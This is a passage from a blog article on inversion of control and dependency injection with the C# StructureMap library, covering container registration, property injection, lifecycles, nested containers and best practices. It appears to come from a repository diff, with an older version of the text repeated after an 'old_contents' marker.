\n\nTo bind a contract to an implementation there is also the Add<T> method, so this code works as well:\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Add<ConsoleLogger>();\n----\n\nNOTE: There is a very clear distinction between the two methods. Add<T> adds an implementation, whereas Use<T> defines the implementation to use, strictly. As a consequence, when you use Use<T>, it is always the last binding to an implementation that wins.\n\nSometimes it is necessary to define how the Container creates the instance. In that case you can use an overload of Use that accepts a description and a function receiving the container's context and returning an instance matching the contract:\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Use(\"Logger instance creation\", (x) =>\n{\n\treturn new ConsoleLogger();\n});\n----\n\nThe dependency is now defined. The code contains no creation logic for the implementations, so it is the Container instance that builds them for us. They can be retrieved by calling the GetInstance<T>() method:\n\n\n[source,csharp]\n----\nvar logger = container.GetInstance<ILogger>();\n----\n\nWARNING: Careful: GetInstance<T> happily accepts concrete types without any problem. Doing so, however, breaks the SOLID dependency inversion principle. Don't forget: depend on abstractions, not on implementations.\n\nIf a dependency is not defined and you try to resolve it, the Container instance throws a configuration exception. There can be cases where you do not know whether a binding exists between a contract and an implementation. In those cases it is better to use the TryGetInstance<T> method and test whether the returned instance is null; this is cheaper than handling the case with a try\/catch block:\n\n[source,csharp]\n----\n\/\/No implementation of IDisposable is configured at this point\nvar disposable = container.TryGetInstance<IDisposable>();\nConsole.WriteLine(disposable == null);\/\/print True\n----\n\nSince Add<T> allows defining several implementations of the same contract, there is a GetAllInstances<T>() method that returns all the matching implementations. If we add a new implementation of ILogger:\n\n[source,csharp]\n----\npublic class FileLogger : ILogger\n{\n\tpublic void Information(string message)\n\t{\n\t\tFile.WriteAllText(\"log.txt\", message);\n\t}\n}\n----\n\nAnd register both implementations in the configuration:\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Add<ConsoleLogger>();\nconfiguration.For<ILogger>().Add<FileLogger>();\n----\n\nCalling the method returns an IEnumerable<ILogger> instance:\n\n[source,csharp]\n----\nvar loggers = container.GetAllInstances<ILogger>();\nConsole.WriteLine(loggers.Count() == 2);\/\/print True\n----\n\nAt this stage you have the basics needed to resolve dependencies. However, the way the Container has been used so far amounts more or less to the ServiceLocator pattern; a Factory could have handled instance creation just as well. It is therefore time to look at dependency injection.
Dans la configuration il faut, lors de la liaison entre un contrat et son impl\u00e9mentation, utiliser la m\u00e9thode Setter pour sp\u00e9cifier quelle type de d\u00e9pendance sous jacente va \u00eatre injecter : \n\n[source,csharp]\n----\nconfiguration.For<IController>().Use<Controller>().Setter<ILogger>().Is<ConsoleLogger>();\n----\n\nLa m\u00e9thode Setter<T> dispose d'une surcharge qui permet d'injecter \u00e0 condition que le nom de la propri\u00e9t\u00e9 match avec celui pass\u00e9 en argument :\n\n[source,csharp]\n----\nconfiguration.For<IController>().Use<Controller>().Setter<ILogger>(\"Logger\").Is<ConsoleLogger>();\n----\n\nNOTE: Cette surcharge peut s'av\u00e9rer pratique, mais attention au renommage, on a vite fait d'oublier d'aller modifier la configuration du Container !\n\nUne fois mise en place il suffit de demander \u00e0 r\u00e9cup\u00e9rer une instance d'une d\u00e9pendance pour que celle ci soit automatiquement injecter avec celle sous-jacente :\n\n[source,csharp]\n----\n\/\/Avec Setter<T> il devient obligatoire de demander une instance correspondant \u00e0 un contrat.\n\/\/IController doit donc \u00eatre d\u00e9finit dans votre code pour que cela fonctionne\nvar controller = container.GetInstance<IController>();\ncontroller.Action();\/\/ print \"Hello from action !\"\n----\n\nCette premi\u00e8re fa\u00e7on de faire est certes \u00e9fficace mais imaginez faire cela pour toutes les d\u00e9pendances... ce n'est pas tr\u00e8s \u00e9l\u00e9gant. En plus il devient compliquer de r\u00e9soudre les d\u00e9pendances sur des instances d\u00e9pendant qu'on voudrait r\u00e9soudre avec le container. Il existe donc une m\u00e9thode plus \u00e9fficace pour mettre en place l'injection par propri\u00e9t\u00e9 : D\u00e9finir des conventions dans le registre des Policies du Container. Pour cela les d\u00e9veloppeurs de StructureMap on tout pr\u00e9vu, il existe une m\u00e9thode SetAllProperties qui attent en param\u00e8tre une action exposant une instance de la classe SetterConvention :\n\n[source,csharp]\n----\nconfiguration.Policies.SetAllProperties(convention => {\n\n});\n----\n\nPlusieurs possibil\u00e9s sont offertes pour d\u00e9finir une convention. La plus simple est celle qui d\u00e9finit une \u00e9xigence de type stricte :\n\n[source,csharp]\n----\nconvention.OfType<ILogger>();\n----\n\nUne convention par namespace peut \u00eatre \u00e9tablit, elle permet de d\u00e9clencher l'injection de la d\u00e9pendance uniquement sur les Type appartenant \u00e0 ce namespace. Deux possibilit\u00e9 de d\u00e9claration, Soit par nom :\n\n[source,csharp]\n----\nconvention.WithAnyTypeFromNamespace(\"MyNamespace\");\n----\n\nSoit en utilisant le namespace d'un type en particulier :\n\n[source,csharp]\n----\nconvention.WithAnyTypeFromNamespaceContainingType<ILogger>();\n----\n\nCes trois exemples de convention permettent de traiter pas mal de cas. La classe SetterConvention offre plusieurs autres possibilit\u00e9s pour customiser sa logique d'injection. Le mieux c'est de les essayer pour voir celle qui conviennent aux besoins.\n\nSans s'en rendre compte, en utilisant les conventions, une nouvelle capacit\u00e9s du Container a \u00e9t\u00e9 d\u00e9v\u00e9rouiller, le BuildUp ! 
Il est maintenant possible de se dispenser d'utiliser la m\u00e9thode GetInstance<T>() pour obtenir une instance d'un d\u00e9pendant avec ses d\u00e9pendances inject\u00e9es :\n\n[source,csharp]\n----\nvar controller = new Controller();\ncontainer.BuildUp(controller);\n----\n\nL'int\u00e9r\u00eat premier est qu'avec cette technique on va pouvoir injecter les d\u00e9pendances d'une instance dont la cr\u00e9ation est faite par un tier. Mine de rien cela ouvre pas mal de possibilit\u00e9 et permet de s'interfacer avec d'autre Framework ou Api qui poss\u00e8de leur propre m\u00e9canique de cr\u00e9ation d'instance (On peut cit\u00e9 par exemple Asp.Net MVC avec les ControllerFactory). C'est aussi une fa\u00e7on de faire qui est plus proche de la th\u00e9orie de l'inversion de contr\u00f4le car dans ce cas pr\u00e9cis il n'y a plus aucun appel direct de r\u00e9solution d'un d\u00e9pendant, le Container se pr\u00e9occupe de se qu'il sait faire de mieux, r\u00e9soudres les d\u00e9pendances !\n\nAu niveau de la m\u00e9canique d'injection des d\u00e9pendances nous avons vu les fondamentaux. Il faut savoir que la m\u00e9thode privili\u00e9gi\u00e9 par la plus part des d\u00e9veloppeurs est celle injectant les d\u00e9pendances par constructeur. Elle demande bien moins d'effort et \u00e9vite d'avoir des propri\u00e9t\u00e9s publique manipulable par le premier venu. Cependant il existe de nombreux cas ou l'insepection par propri\u00e9t\u00e9 est indispensanble (par exemple pour injecter des d\u00e9pendances dans des attributs), donc il ne faut pas non plus compl\u00e9tement \u00e9carter cette possibilit\u00e9. Personnellement j'utilise beaucoup l'injection par propri\u00e9t\u00e9 car \u00e7a permet d'avoir une grande compacit\u00e9 de code en plus d\u00e9viter de manipuler l'affectation des r\u00e9f\u00e9rences \u00e0 la main (je trouve que c'est plus clean sur ce point). Cependant quand je le fait je suis beaucoup plus stricte sur les r\u00e8gles de manipulation de ses instances. Il faut clairement que la responsabilit\u00e9 de leur manipulation soit faite uniquement par le d\u00e9pendant, sinon c'est la porte ouvert \u00e0 de nombreux probl\u00e8me.\n\n\n== Lifecycle\n\nDepuis le d\u00e9but de cette article la cr\u00e9ation des instances des d\u00e9pendances a \u00e9t\u00e9 compl\u00e9tement d\u00e9l\u00e9gu\u00e9 \u00e0 la classe Container. La grand question \u00e0 pr\u00e9sent est : Comment puis g\u00e9rer le cycle de vie des instances au sein de mon container ?\n\nStructureMap, comme tout les container IoC, met \u00e0 disposition un ensemble de m\u00e9thode et classe pour g\u00e9rer cela. Par d\u00e9faut lorsque l'ont ajouter une liaison entre un contrat et une impl\u00e9mentation, le container va d\u00e9finir leur cycle de vie \u00e0 l'\u00e9tat Transient. Cela veut dire qu'\u00e0 chaque fois qu'il r\u00e9soudra une d\u00e9pendance il cr\u00e9ra une instance. Il est tout fa\u00e7on possible de mettre explicitement la d\u00e9pendance dans le mode Transient :\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Use<ConsoleLogger>().Transient();\n----\n\nLogiquement si l'on demande deux fois la d\u00e9pendance, la r\u00e9f\u00e9rence est diff\u00e9rente :\n\n[source,csharp]\n----\nvar logger = container.GetInstance<ILogger>();\nvar logger2 = container.GetInstance<ILogger>();\nConsole.WriteLine(logger == logger2);\/\/print False\n----\n\nUn cas r\u00e9gulier dans le cycle de vie des objets c'est l'instance unique. 
Pour le faire on utilise la m\u00e9thode Singleton :\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Use<ConsoleLogger>().Singleton();\n----\n\nEn cons\u00e9quence le test de r\u00e9f\u00e9rence que l'on a fait pr\u00e9cedement renvoie True :\n\n[source,csharp]\n----\nvar logger = container.GetInstance<ILogger>();\nvar logger2 = container.GetInstance<ILogger>();\nConsole.WriteLine(logger == logger2);\/\/print True\n----\n\nCes deux cas sont parmis les principaux que l'ont trouve dans le d\u00e9veloppement mais il en existe d'autre qui permettent de g\u00e9rer la vie de l'instance sur un Thread ou encore dans un container encapsuler dans un scope temporaire (ContainerScoped, utiliser pour g\u00e9rer notamment le cas de DNX).\n\nIl existe une autre fa\u00e7on de d\u00e9clarer un cycle de vie avec StructureMap. Dans la biblioth\u00e8que une interface ILifecycle permet d'impl\u00e9menter facilement sont propre cycle de vie. Il est ensuite possible de l'utiliser dans la configuration avec la m\u00e9thode LifecycleIs<T> (ou T impl\u00e9mente ILifecycle).\n\nWARNING: Les cycles de vies personnalis\u00e9s peuvent \u00eatre utils\u00e9 dans bien des cas. Il existe des biblioth\u00e8ques qui fournissent des cycles sp\u00e9cialis\u00e9s, comme pour le Web par exemple. Avec la version 4 de StructureMap l'\u00e9quipe de d\u00e9veloppement encouragement fortement a ne plus utilis\u00e9 se mode fonctionnement mais \u00e0 pr\u00e9f\u00e9rer l'utilisation du NestedContainer \u00e0 la place. Il permette de repondre \u00e0 95% des cas de figures sans avoir besoin de librairie annexe ni de code suppl\u00e9mentaire.\n\nComme indiquer dans la note au dessus les NestedContainer permette aussi de g\u00e9rer le cycle de vie des instances. En les utilisant on se simplifie clairement la vie car \u00e0 partir du moment ou le NestedContainer est r\u00e9cup\u00e9rer tout les instances qui sont obtenues lui sont propre. Il suffit ensuite d'appeller la m\u00e9thode Dispose pour le lib\u00e9rer. C'est une m\u00e9thode tr\u00e8s fl\u00e9xible puisqu'elle suffit d'\u00e9tablir un scope pour que cela fonctionne. En plus dans ce mode toutes les d\u00e9pendances qui implemente IDisposable sont Dispose lors de l'appel \u00e0 la m\u00e9thode sur le NestedContainer. Du coup les trois \u00e9tats de StructureMap suffisent \u00e0 g\u00e9rer tous les cas, y compris ceux li\u00e9e au context Web. Pour illustrer cela un Scope simple peut \u00eatre imagin\u00e9 : L'\u00e9xecution d'une ligne de code. Dans ce cas voici les \u00e9tapes qui va falloir faire pour le mettre en place :\n\n* Le NestedContainer est cr\u00e9e et d\u00e9marrer le Scope\n* Le code voulut est execut\u00e9\n* Le NestedContainer lib\u00e8re les d\u00e9pendances.\n\nCes trois \u00e9tapes peuvent bien \u00e9videment \u00eatre rejouer \u00e0 l'infinit. 
Pour illustrer le bon fonctionnement du Dispose, un impl\u00e9mentation de ILogger disposable va \u00eatre utilis\u00e9 :\n\n[source,csharp]\n----\npublic class DisposableConsoleLogger : ConsoleLogger, IDisposable\n{\n\tpublic void Dispose()\n\t{\n\t\tConsole.WriteLine(\"Hello form Dispose !\");\n\t}\n}\n----\n\nPour la configuration rien ne change \u00e0 par le Use<T> qui utilise DisposableConsoleLogger :\n\n[source,csharp]\n----\nvar container = new Container(configuration =>\n{\n\tconfiguration.For<ILogger>().Use<DisposableConsoleLogger>();\n});\n----\n\nLe code des trois \u00e9tapes est le suivant :\n\n[source,csharp]\n----\nvar nested = container.GetNestedContainer();\nvar logger = nested.GetInstance<ILogger>();\nnested.Dispose();\/\/print Hello form Dispose !\n----\n\nPour illustrer l'isolation nette de se scope il suffit de l'inclure dans une boucle for et de test si la derni\u00e8re instance r\u00e9cup\u00e9rer est la m\u00eame que la courrant :\n\n[source,csharp]\n----\nILogger last = null;\nfor(var i = 0; i < 10; i++)\n{\n\tvar nested = container.GetNestedContainer();\n\tvar logger = nested.GetInstance<ILogger>();\n\tif (last != null)\n\tConsole.WriteLine(last == logger);\/\/print False\n\tlast = logger;\n\tnested.Dispose();\/\/print Hello form Dispose !\n}\n----\n\nAu final vraiement rien de compliqu\u00e9 avec le NestedContainer. C'est une technique puissante et tr\u00e8s \u00e9l\u00e9gante, il suffit juste de clairement d\u00e9finir son Scoping dans une application !\n\nArriver \u00e0 ce stade, le tour d'horizon de StructureMap est fait. Vous avez \u00e0 pr\u00e9sent les cl\u00e9s pour le mettre en place dans vos projets. L'exemple qui m'a servit pour \u00e9crire l'article est disponible sur Github Gist : https:\/\/gist.github.com\/Vtek\/7e5064a188417713a2d8[ici].\n\nPour finir je vous propose une derni\u00e8re petite partie sur les...\n\n\n== Best practices\n\nVoici un ensemble de r\u00e8gle qu'il est bon de suivre :\n\n* Masquer l'acc\u00e8s au Container : L'inversion de contr\u00f4le sert \u00e0 casser les adh\u00e9rances. Si vous utilise sp\u00e9cifiquement un Container pour r\u00e9soudre des d\u00e9pendances alors c'est l'inverse qui se produit. Il vaut donc mieux passer par une couche interm\u00e9diaire qui va vous permettre de changer le Container facileement si besoin.\n\n* Pr\u00e9f\u00e9re l'injection par constructeur : Elle ne demande pas de logique d'injection et est par cons\u00e9quent la mani\u00e8re la plus simple de la mettre en place !\n\n* N'oublier pas l'injection par propri\u00e9t\u00e9 : Certains cas ne sont pas traitable avec l'injection par constructeur, n'h\u00e9sitez surtout pas \u00e0 utiliser celle par propri\u00e9t\u00e9, elle est l\u00e0 pour \u00e7a !\n\n* Ne m\u00e9langer pas les cycles de vie : Beaucoup ont essayer et se sont casser les dents. Mise \u00e0 part le Singleton qui est simple \u00e0 comprendre et m\u00e9langer pour le reste abstenez-vous. En mixant le risque c'est que plus le projet grossit plus la grappe de r\u00e9tention entre les instances devient complexe. On peut vite arriver \u00e0 des situations hors de contr\u00f4le.\n\n* N'injectez pas des types primitifs : Techniquement c'est faisable mais c'est une erreur. 
Les d\u00e9pendant attentend des d\u00e9pendances d\u00e9finit par des contracts, les types primitifs ne r\u00e9pondent pas cela.\n\n* Ne faite pas de r\u00e9solution de d\u00e9pendance base sur des chaines de charact\u00e8re (Nom, Type, Namespace) : Ici encore techniquement c'est possible mais \u00e7a compl\u00e9xifie la maintenance et \u00e7a oblige \u00e0 revalider la configuration du Container \u00e0 chaque renommage de d\u00e9pendance, propri\u00e9t\u00e9, namespace. Au final vous allez perdre du temps et il y a d'autre fa\u00e7on de le faire bien plus \u00e9fficace.\n\n* Inutile de d\u00e9finir des cycles de vie, il vaut mieux utilis\u00e9 le Scoping : L'exemple des NestedContainer par de lui m\u00eame :)\n\n* Ne m\u00e9langer pas IoC et Reflexion : C'est une fausse bonne id\u00e9e. Se sont deux aspects bien diff\u00e9rents qui peuvent parfois aboutir au m\u00eame r\u00e9sultat mais qui n'ont pas du tout la m\u00eame vocation. Si vous en arriver \u00e0 faire de la r\u00e9flexion pour Activer des d\u00e9pendances dans ce cas l\u00e0 utiliser plut\u00f4t https:\/\/msdn.microsoft.com\/fr-fr\/library\/dd460648(v=vs.110).aspx[MEF] . Si se n'est pas le cas alors vous faites tr\u00e8s certainement quelque chose qu'un Container IoC fait d\u00e9j\u00e0 :)\n\n* Votre container ne devrait jamais \u00eatre utiliser dans des tests unitaires\n\n* Les d\u00e9pendances peuvent grossir en nombre rapidement. Pour mieux organiser leur configuration il existe dans StructureMap une classe appel\u00e9 Registry. Cette classe permet de grouper la configuration par domaine de d\u00e9pendance.\n\n* Avec l'inversion de contr\u00f4le la r\u00e9solution des d\u00e9pendances se fait au runtime. C'est donc l'application qui doit tenir les r\u00e9f\u00e9rences. Inutile d'essayer de les masquer, vous ne gagnerez pas plus de temps ni de confort de d\u00e9veloppement !\n\n\n== Conclusion\n\nS'en est finit pour cette article. J'\u00e9sp\u00e8re que vous aurez apr\u00e9ci\u00e9 la lecture. L'inversion de contr\u00f4le est un concept qui de nos jours doit \u00eatre connu, car de nombreux projets le mettent en oeuvre. StructureMap est un excellente biblioth\u00e8que. J'aurais aim\u00e9 vous pr\u00e9sentez de ses capacit\u00e9s mais elles sont tellement nombreuses qu'il faudrait plusieurs articles pour tout traiter !\n","old_contents":"= Inverser le contr\u00f4le avec StructueMap !\n:hp-image: introduction-a-angular2.png\n:published_at: 2015-12-02\n:hp-tags: C#, IoC, StructureMap\n\n\nL'inversion de contr\u00f4le (aka *IoC*) est un pattron d'architecture permettant de casser les adh\u00e9renses entre les d\u00e9pendances. Ce d\u00e9couplage permet au d\u00e9pendances de haut niveau de ne plus reposer directement sur celle de bas niveau et de passer par une couche d'abstration. L'objectif est d'am\u00e9liorer la modularit\u00e9 des applications afin de faciliter les \u00e9tapes de maintenance et d'\u00e9volution.\n\n\n== Pourquoi ce pattern ?\n\nAvant de montrer la mise en place de l'inversion de contr\u00f4le il est pr\u00e9f\u00e9rable d'expliquer comment on en est arriv\u00e9 l\u00e0 !\n\nLe probl\u00e8me de d\u00e9part est assez simple en r\u00e9alit\u00e9. Si on a une application d\u00e9velopp\u00e9e en couche et que l'ont fait reposer chaqu'une d'elle sur une autre de plus bas niveau, que va-t-il se passer si par la suite on veut changer, modifier, supprimer la couche la plus basse ? Le probl\u00e8me est l\u00e0, il va falloir modifier la couche de plus haut niveau pour l'adapter en cons\u00e9quence. 
Il est d'ailleurs fort probable que cela d\u00e9clencher des modification en cascade sur toutes les couches haut niveau.\n\nAvec l'inversion de contr\u00f4le on va plut\u00f4t faire reposer chaque couche sur une abstraction afin de passer de \u00e7a :\n\n[Sch\u00e9ma]\n\nA \u00e7a :\n\n[Sch\u00e9ma]\n\nLa diff\u00e9rence est suptile mais importante. Dans le second sh\u00e9mas, changer les couches concr\u00eates de mon application n'entraine pas de probl\u00e8mes de structure, tout compilera. Mieux encore, le d\u00e9veloppement de l'application peut \u00eatre abstrait et n'avoir aucunes connaissances du fonctionnement bas niveau. Plus fort, je peux d\u00e9finir des abstractions utilis\u00e9s par les couches de bas niveau qui sont impl\u00e9ment\u00e9es en haut niveau. Un autre int\u00e9ressant, les test unitaires deviennent beaucoup plus simple et pertinent car les d\u00e9pendances ne rentre plus en compte dans l'\u00e9tape de validation.\n\nAu final en utilisant l'inversion de contr\u00f4le, votre application va devenir plus modulaire, souple, maintenable, \u00e9volutive et testable.\n\nNOTE: L'inversion de contr\u00f4le permet aussi de respecter un des principes majeurs de https:\/\/en.wikipedia.org\/wiki\/SOLID_(object-oriented_design)[SOLID] : l'inversion des d\u00e9pendances. Ce principe d\u00e9finit qu'il faut toujours d\u00e9pendre des abstractions et non des impl\u00e9mentations. Les principes SOLID sont consid\u00e9rer par beaucoup comme les _\"Best Pratices\"_ de la POO. Ils permettent d'avoir un d\u00e9veloppement \u00e9fficace et fiable.\n\nParmis les mani\u00e8res les plus courrante de mettre en place l'IoC, il existe :\n\n* Le pattern https:\/\/en.wikipedia.org\/wiki\/Factory_(object-oriented_programming)[Factory] qui permet de d\u00e9l\u00e9gu\u00e9 la cr\u00e9ation d'instance. Une approche rudimentaire mais qui a le m\u00e9rite d'\u00eatre simple dans sa mise en place.\n* Le pattern https:\/\/en.wikipedia.org\/wiki\/Service_locator_pattern[Service Locator] qui via l'utilisation d'un registrer permet de retourver des impl\u00e9mentations correspondant \u00e0 des contrats.\n* Le pattern https:\/\/en.wikipedia.org\/wiki\/Dependency_injection[Dependancy injection] qui permet de passer une d\u00e9pendance \u00e0 un object d\u00e9pendant.\n\nLa suite de l'article va se concentrer sur le troisi\u00e8me pattern, Depenceny Injection. Factory est un pattern trop simplice pour permettre de r\u00e9soudre les d\u00e9pendances \u00e0 lui seul et Service Locator est devenu au fil du temps un anti-pattern (notamment parce qu'il cr\u00e9e de l'ah\u00e9rence alors que c'est l'inverse que l'ont veut).\n\n\n== StructureMap en action : les bases !\n\nIl existe de nombreuse biblioth\u00e8que d\u00e9di\u00e9e \u00e0 l'IoC. Sinc\u00e9rement il n'y a pas de mauvais choix m\u00eame si j'ai tendance \u00e0 d\u00e9conseiller celle de Microsoft (https:\/\/github.com\/unitycontainer\/unity[Unity]) qui est \u00e0 la traine par rapport \u00e0 la concurrence. Pour ma part j'ai longtemps utilis\u00e9 Ninject pour son c\u00f4t\u00e9 _\"Simple & Straightforward\"_, tr\u00e8s \u00e9fficace en d\u00e9veloppement bien qu'un peu lent \u00e0 l'execution il faut l'admettre. Derni\u00e8rement j'ai d\u00e9cid\u00e9 de changer et je me suis mis sur StructureMap, un container historique (le premier en C#) qui embarque d'innombrables capacit\u00e9s pour un niveau de performance tr\u00e8s correct. 
\nNOTE: Inversion of control also helps satisfy one of the major principles of https:\/\/en.wikipedia.org\/wiki\/SOLID_(object-oriented_design)[SOLID]: dependency inversion. This principle states that you should always depend on abstractions, never on implementations. The SOLID principles are considered by many to be the _\"Best Practices\"_ of OOP. They make development efficient and reliable.\n\nAmong the most common ways to put IoC in place are:\n\n* The https:\/\/en.wikipedia.org\/wiki\/Factory_(object-oriented_programming)[Factory] pattern, which delegates instance creation. A rudimentary approach, but it has the merit of being simple to set up.\n* The https:\/\/en.wikipedia.org\/wiki\/Service_locator_pattern[Service Locator] pattern, which uses a registry to find implementations matching contracts.\n* The https:\/\/en.wikipedia.org\/wiki\/Dependency_injection[Dependency Injection] pattern, which passes a dependency to a dependent object.\n\nThe rest of the article focuses on the third pattern, Dependency Injection. Factory is too simplistic a pattern to resolve dependencies on its own, and Service Locator has turned into an anti-pattern over time (notably because it creates coupling, which is the opposite of what we want).\n\n\n== StructureMap in action: the basics!\n\nThere are many libraries dedicated to IoC. Honestly, there is no bad choice, even if I tend to advise against Microsoft's (https:\/\/github.com\/unitycontainer\/unity[Unity]), which lags behind the competition. I long used Ninject for its _\"Simple & Straightforward\"_ side, very efficient for development although admittedly a bit slow at runtime. Recently I decided to switch and moved to StructureMap, a historic container (the first one in C#) that packs countless capabilities for a very decent level of performance. It is a good compromise between capability and power, and since version 3 the team has done a lot of work to get closer to Ninject's approach. On top of that it has been actively developed for almost 10 years, it has rich and complete documentation, and it is the first to offer DNX support with version 4. That is the version we will use today!\n\nTo install StructureMap, just add the NuGet package with the command:\n\n----\nInstall-Package StructureMap\n----\n\nThe first class of interest is Container. It is the central piece of the library. It lets us define the dependencies to resolve, the way they are resolved, and how to retrieve them.\nTo define a dependency we need a contract. For the purposes of the article I will define one:\n\n[source,csharp]\n----\npublic interface ILogger\n{\n\tvoid Information(string message);\n}\n----\n\nThe interface corresponds to a logger that writes an informational message. Its implementation is the following:\n\n[source,csharp]\n----\npublic class ConsoleLogger : ILogger\n{\n\tpublic void Information(string message)\n\t{\n\t\tConsole.WriteLine(message);\n\t}\n}\n----\n\nTo resolve this dependency through the container, it has to be registered. The class has a constructor accepting an action that exposes a configuration object. This object defines the bindings between contract and implementation with the For<T> and Use<T> methods:\n\n[source,csharp]\n----\nvar container = new Container(configuration =>\n{\n\tconfiguration.For<ILogger>().Use<ConsoleLogger>();\n});\n----\n\nBoth methods have an overload taking Type objects as parameters. The result is the same, but it is syntactically heavier to read. To bind the contract to an implementation there is also the Add<T> method, so this code works as well:\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Add<ConsoleLogger>();\n----\n\nNOTE: There is a very clear distinction between the two methods. Add<T> adds an implementation, whereas Use<T> defines the implementation as the one to use. Consequently, when you use Use<T>, the last binding to an implementation always wins.\n\nSometimes it is necessary to define how the Container will create the instance; in that case an overload of Use can be used, which accepts a Function receiving the container context and returning an instance matching the contract:\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Use(\"Logger instance creation\", (x) =>\n{\n\treturn new ConsoleLogger();\n});\n----\n\nThe dependency is now registered. The code contains no creation logic for the implementations, so the Container instance will build them for us.
They can be retrieved by calling the GetInstance<T>() method:\n\n\n[source,csharp]\n----\nvar logger = container.GetInstance<ILogger>();\n----\n\nWARNING: Careful, the GetInstance<T> method happily accepts concrete types without complaining. However, doing so breaks the SOLID dependency inversion principle. Remember: depend on abstractions, not on implementations.\n\nIf a dependency is not registered and we try to resolve it, the Container instance throws a configuration exception. There can be cases where we do not know whether a binding exists between a contract and an implementation. In that case it is better to use the TryGetInstance<T> method and test whether the returned instance is null; it is cheaper than handling the case with a try\/catch block:\n\n[source,csharp]\n----\n\/\/No implementation of IDisposable is currently configured\nvar disposable = container.TryGetInstance<IDisposable>();\nConsole.WriteLine(disposable == null);\/\/print True\n----\n\nSince the Add<T> method allows several implementations of the same contract, there is a GetAllInstances<T>() method that returns every matching implementation. If we add a new implementation of ILogger:\n\n[source,csharp]\n----\npublic class FileLogger : ILogger\n{\n\tpublic void Information(string message)\n\t{\n\t\tFile.WriteAllText(\"log.txt\", message);\n\t}\n}\n----\n\nAnd register both implementations in the configuration:\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Add<ConsoleLogger>();\nconfiguration.For<ILogger>().Add<FileLogger>();\n----\n\nCalling the method returns an IEnumerable<ILogger> instance:\n\n[source,csharp]\n----\nvar loggers = container.GetAllInstances<ILogger>();\nConsole.WriteLine(loggers.Count() == 2);\/\/print True\n----\n\nAt this point you have the basics to resolve dependencies. However, the current use of the Container amounts, more or less, to the ServiceLocator pattern. We could just as well have written a Factory to handle instance creation. It is therefore time to look at dependency injection.\n\n== Injection\n\nTo inject dependencies we need a higher-level class that relies on the contract established in ILogger. To stick with a simple case, take the example of a controller which, when executing an action, logs a message through the logger.
To break the coupling, the dependency implementing ILogger must be passed through the constructor:\n\n[source,csharp]\n----\npublic class Controller\n{\n\tprivate ILogger _logger;\n\n\tpublic Controller(ILogger logger)\n\t{\n\t\t_logger = logger;\n\t}\n\n\tpublic void Action()\n\t{\n\t\tthis._logger.Information(\"Hello from action !\");\n\t}\n}\n----\n\nAfter configuring the Container to bind one of the two ILogger implementations, an instance of the Controller class can be retrieved through the GetInstance<T>() method:\n\n\n[source,csharp]\n----\nvar container = new Container(configuration =>\n{\n\tconfiguration.For<ILogger>().Use<ConsoleLogger>();\n});\n\nvar controller = container.GetInstance<Controller>();\ncontroller.Action();\/\/ print \"Hello from action !\"\n----\n\nI can already hear some of you pointing out the *Warning* above about calling GetInstance<T> without an interface! In reality things are different here, because Controller is not a dependency but a dependent. The resolution therefore complies with the dependency inversion principle. This way of proceeding is one of the most common in the .Net world (it shows up as DependencyResolver in the Microsoft frameworks).\n\nStructureMap also offers the possibility of injecting dependencies through property inspection rather than through the constructor. It is an interesting alternative that is easy to put in place. For a start, it shrinks the Controller class down to:\n\n[source,csharp]\n----\npublic class Controller\n{\n\tpublic ILogger Logger { get; set; }\n\n\tpublic void Action()\n\t{\n\t\tthis.Logger.Information(\"Hello from action !\");\n\t}\n}\n----\n\nBy default StructureMap will not resolve the dependency as-is. In the configuration, when binding a contract to its implementation, the Setter method must be used to specify which underlying dependency type will be injected: \n\n[source,csharp]\n----\nconfiguration.For<IController>().Use<Controller>().Setter<ILogger>().Is<ConsoleLogger>();\n----\n\nThe Setter<T> method has an overload that injects only when the property name matches the one passed as argument:\n\n[source,csharp]\n----\nconfiguration.For<IController>().Use<Controller>().Setter<ILogger>(\"Logger\").Is<ConsoleLogger>();\n----\n\nNOTE: This overload can come in handy, but beware of renames; it is easy to forget to update the Container configuration!\n\nOnce this is in place, simply request an instance of a dependency and the underlying one is automatically injected:\n\n[source,csharp]\n----\n\/\/With Setter<T> it becomes mandatory to request an instance matching a contract.\n\/\/IController must therefore be defined in your code for this to work\nvar controller = container.GetInstance<IController>();\ncontroller.Action();\/\/ print \"Hello from action !\"\n----\n\nThis first way of doing things certainly works, but imagine doing that for every dependency... it is not very elegant.
On top of that, it becomes complicated to resolve the dependencies of dependent instances that we would like the container to resolve. There is thus a more effective way to set up property injection: defining conventions in the Container's Policies registry. The StructureMap developers have it covered; a SetAllProperties method expects an action exposing an instance of the SetterConvention class:\n\n[source,csharp]\n----\nconfiguration.Policies.SetAllProperties(convention => {\n\n});\n----\n\nSeveral options are available to define a convention. The simplest one states a strict type requirement:\n\n[source,csharp]\n----\nconvention.OfType<ILogger>();\n----\n\nA namespace convention can also be established; it triggers the injection of the dependency only on the types belonging to that namespace. Two ways to declare it, either by name:\n\n[source,csharp]\n----\nconvention.WithAnyTypeFromNamespace(\"MyNamespace\");\n----\n\nOr by using the namespace of a particular type:\n\n[source,csharp]\n----\nconvention.WithAnyTypeFromNamespaceContainingType<ILogger>();\n----\n\nThese three convention examples already cover a lot of cases. The SetterConvention class offers several other ways to customize the injection logic. The best approach is to try them out and see which ones fit your needs.\n\nWithout noticing it, by using conventions we have unlocked a new capability of the Container: BuildUp! It is now possible to do without the GetInstance<T>() method to obtain a dependent instance with its dependencies injected:\n\n[source,csharp]\n----\nvar controller = new Controller();\ncontainer.BuildUp(controller);\n----\n\nThe primary benefit of this technique is that it injects the dependencies of an instance whose creation is done by a third party. This quietly opens up quite a few possibilities and allows interfacing with other frameworks or APIs that have their own instance-creation mechanics (ASP.Net MVC with its ControllerFactory, for example). It is also a way of working that is closer to the theory of inversion of control, because in this precise case there is no longer any direct resolution call for a dependent; the Container focuses on what it does best: resolving dependencies!\n\nAs far as the dependency injection mechanics go, we have covered the fundamentals. Know that the method favored by most developers is constructor injection. It requires far less effort and avoids public properties that anyone can tamper with. However, there are many cases where property inspection is indispensable (for example to inject dependencies into attributes), so this option should not be ruled out entirely.
